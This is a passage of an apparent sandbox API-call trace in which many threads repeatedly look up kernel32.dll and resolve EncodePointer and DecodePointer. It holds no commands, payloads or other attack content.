cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.346] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.348] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.349] SysReAllocStringLen (in: pbstr=0x168cf928*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168cf928*="KERNEL32.DLL") returned 1 [0208.349] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.349] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.352] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0208.355] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.482] SysReAllocStringLen (in: pbstr=0x168cfc00*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168cfc00*="KERNEL32.DLL") returned 1 [0208.482] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.483] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.486] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 239 os_tid = 0xe0 [0208.805] SysReAllocStringLen (in: pbstr=0xb61f74c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb61f74c*="KERNEL32.DLL") returned 1 [0208.805] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.806] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.809] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.810] SysReAllocStringLen (in: pbstr=0xb61f74c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb61f74c*="KERNEL32.DLL") returned 1 [0208.810] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.810] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.813] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.814] SysReAllocStringLen (in: pbstr=0xb61f728*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb61f728*="KERNEL32.DLL") returned 1 [0208.814] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.814] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.817] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0208.820] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0208.872] SysReAllocStringLen (in: pbstr=0xb61fa00*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb61fa00*="KERNEL32.DLL") returned 1 [0208.872] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0208.873] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0208.876] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 240 os_tid = 0xe4 [0209.464] SysReAllocStringLen (in: pbstr=0xb63f52c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb63f52c*="KERNEL32.DLL") returned 1 [0209.464] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.465] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.467] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.467] SysReAllocStringLen (in: pbstr=0xb63f52c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb63f52c*="KERNEL32.DLL") returned 1 [0209.467] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.468] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.470] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.470] SysReAllocStringLen (in: pbstr=0xb63f508*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb63f508*="KERNEL32.DLL") returned 1 [0209.470] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.471] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.473] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0209.476] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.651] SysReAllocStringLen (in: pbstr=0xb63f7e0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb63f7e0*="KERNEL32.DLL") returned 1 [0209.651] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.651] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.654] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 241 os_tid = 0xe8 [0209.656] SysReAllocStringLen (in: pbstr=0x936f88c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x936f88c*="KERNEL32.DLL") returned 1 [0209.656] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.656] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.659] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.659] SysReAllocStringLen (in: pbstr=0x936f88c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x936f88c*="KERNEL32.DLL") returned 1 [0209.659] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.659] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.662] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.662] SysReAllocStringLen (in: pbstr=0x936f868*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x936f868*="KERNEL32.DLL") returned 1 [0209.662] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.664] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0209.667] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0210.027] SysReAllocStringLen (in: pbstr=0x936fb40*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x936fb40*="KERNEL32.DLL") returned 1 [0210.027] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0210.028] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0210.031] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 242 os_tid = 0xec [0209.624] SysReAllocStringLen (in: pbstr=0x168ef7b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ef7b4*="KERNEL32.DLL") returned 1 [0209.624] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.625] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.627] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.627] SysReAllocStringLen (in: pbstr=0x168ef7b4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ef7b4*="KERNEL32.DLL") returned 1 [0209.627] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.628] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.630] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.630] SysReAllocStringLen (in: pbstr=0x168ef790*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168ef790*="KERNEL32.DLL") returned 1 [0209.630] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.633] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0209.635] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.789] SysReAllocStringLen (in: pbstr=0x168efa68*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x168efa68*="KERNEL32.DLL") returned 1 [0209.790] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.790] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.793] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 243 os_tid = 0x69c [0209.636] SysReAllocStringLen (in: pbstr=0x6adf724*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adf724*="KERNEL32.DLL") returned 1 [0209.636] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.637] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.639] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.639] SysReAllocStringLen (in: pbstr=0x6adf724*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adf724*="KERNEL32.DLL") returned 1 [0209.639] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.640] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.642] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.642] SysReAllocStringLen (in: pbstr=0x6adf700*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adf700*="KERNEL32.DLL") returned 1 [0209.642] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.642] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.645] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0209.648] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0209.864] SysReAllocStringLen (in: pbstr=0x6adf9d8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6adf9d8*="KERNEL32.DLL") returned 1 [0209.864] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0209.867] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0209.871] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 244 os_tid = 0xbf4 [0210.328] SysReAllocStringLen (in: pbstr=0x6aff814*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aff814*="KERNEL32.DLL") returned 1 [0210.328] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0210.328] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0210.332] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0210.332] SysReAllocStringLen (in: pbstr=0x6aff814*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aff814*="KERNEL32.DLL") returned 1 [0210.332] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0210.333] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0210.336] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0210.336] SysReAllocStringLen (in: pbstr=0x6aff7f0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aff7f0*="KERNEL32.DLL") returned 1 [0210.336] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0210.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0210.340] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0210.343] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0210.347] SysReAllocStringLen (in: pbstr=0x6affac8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6affac8*="KERNEL32.DLL") returned 1 [0210.347] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0210.347] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0210.350] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 245 os_tid = 0x928 [0210.978] SysReAllocStringLen (in: pbstr=0x936f614*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x936f614*="KERNEL32.DLL") returned 1 [0210.978] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0210.978] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0210.988] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0210.988] SysReAllocStringLen (in: pbstr=0x936f614*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x936f614*="KERNEL32.DLL") returned 1 [0210.989] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0210.989] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0210.994] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0210.994] SysReAllocStringLen (in: pbstr=0x936f5f0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x936f5f0*="KERNEL32.DLL") returned 1 [0210.995] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0210.995] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0210.999] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0211.002] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0211.190] SysReAllocStringLen (in: pbstr=0x936f8c8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x936f8c8*="KERNEL32.DLL") returned 1 [0211.190] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0211.191] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0211.193] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 246 os_tid = 0xbf0 [0211.884] SysReAllocStringLen (in: pbstr=0xb5df45c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5df45c*="KERNEL32.DLL") returned 1 [0211.884] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0211.885] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0211.888] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0211.889] SysReAllocStringLen (in: pbstr=0xb5df45c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5df45c*="KERNEL32.DLL") returned 1 [0211.889] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0211.889] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0211.893] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0211.893] SysReAllocStringLen (in: pbstr=0xb5df438*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5df438*="KERNEL32.DLL") returned 1 [0211.893] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0211.894] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0211.899] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0211.903] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.101] SysReAllocStringLen (in: pbstr=0xb5df710*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb5df710*="KERNEL32.DLL") returned 1 [0212.101] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.102] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.105] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 247 os_tid = 0x8b8 [0212.002] SysReAllocStringLen (in: pbstr=0xb6df53c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6df53c*="KERNEL32.DLL") returned 1 [0212.002] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.003] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.007] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.007] SysReAllocStringLen (in: pbstr=0xb6df53c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6df53c*="KERNEL32.DLL") returned 1 [0212.007] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.009] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.010] SysReAllocStringLen (in: pbstr=0xb6df518*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6df518*="KERNEL32.DLL") returned 1 [0212.010] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.010] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.012] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0212.014] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.336] SysReAllocStringLen (in: pbstr=0xb6df7f0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb6df7f0*="KERNEL32.DLL") returned 1 [0212.336] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.336] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.339] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 248 os_tid = 0xbd8 [0213.195] SysReAllocStringLen (in: pbstr=0xb66f3a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb66f3a4*="KERNEL32.DLL") returned 1 [0213.195] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0213.196] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0213.198] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0213.198] SysReAllocStringLen (in: pbstr=0xb66f3a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb66f3a4*="KERNEL32.DLL") returned 1 [0213.198] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0213.199] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0213.201] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0213.201] SysReAllocStringLen (in: pbstr=0xb66f380*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb66f380*="KERNEL32.DLL") returned 1 [0213.201] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0213.202] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0213.204] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0213.206] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0213.490] SysReAllocStringLen (in: pbstr=0xb66f658*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb66f658*="KERNEL32.DLL") returned 1 [0213.490] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0213.491] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0213.494] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 249 os_tid = 0xbf8 [0213.254] SysReAllocStringLen (in: pbstr=0xb77f5a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb77f5a4*="KERNEL32.DLL") returned 1 [0213.254] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0213.255] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0213.257] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0213.257] SysReAllocStringLen (in: pbstr=0xb77f5a4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb77f5a4*="KERNEL32.DLL") returned 1 [0213.257] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0213.258] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0213.260] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0213.260] SysReAllocStringLen (in: pbstr=0xb77f580*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb77f580*="KERNEL32.DLL") returned 1 [0213.260] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0213.261] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0213.263] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0213.266] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0213.708] SysReAllocStringLen (in: pbstr=0xb77f858*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb77f858*="KERNEL32.DLL") returned 1 [0213.708] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0213.709] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0213.711] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 250 os_tid = 0xb98 [0214.134] SysReAllocStringLen (in: pbstr=0x6b0fb34*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6b0fb34*="KERNEL32.DLL") returned 1 [0214.135] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.135] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.138] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0214.139] SysReAllocStringLen (in: pbstr=0x6b0fb34*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6b0fb34*="KERNEL32.DLL") returned 1 [0214.139] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.139] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.142] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0214.143] SysReAllocStringLen (in: pbstr=0x6b0fb10*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6b0fb10*="KERNEL32.DLL") returned 1 [0214.143] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.143] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.146] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0214.149] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0214.456] SysReAllocStringLen (in: pbstr=0x6b0fde8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6b0fde8*="KERNEL32.DLL") returned 1 [0214.456] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.457] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.460] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 251 os_tid = 0x600 [0214.748] SysReAllocStringLen (in: pbstr=0xb68f644*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb68f644*="KERNEL32.DLL") returned 1 [0214.748] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.749] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.752] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0214.753] SysReAllocStringLen (in: pbstr=0xb68f644*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb68f644*="KERNEL32.DLL") returned 1 [0214.753] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.753] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.756] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0214.757] SysReAllocStringLen (in: pbstr=0xb68f620*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb68f620*="KERNEL32.DLL") returned 1 [0214.757] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.757] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.760] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0214.763] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0214.911] SysReAllocStringLen (in: pbstr=0xb68f8f8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0xb68f8f8*="KERNEL32.DLL") returned 1 [0214.911] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.912] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.915] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 252 os_tid = 0x924 [0214.856] SysReAllocStringLen (in: pbstr=0x6aef864*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aef864*="KERNEL32.DLL") returned 1 [0214.856] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.856] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.859] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0214.860] SysReAllocStringLen (in: pbstr=0x6aef864*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aef864*="KERNEL32.DLL") returned 1 [0214.860] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.860] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0214.863] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0214.864] SysReAllocStringLen (in: pbstr=0x6aef840*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6aef840*="KERNEL32.DLL") returned 1 [0214.864] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0214.864] GetModuleHandleW 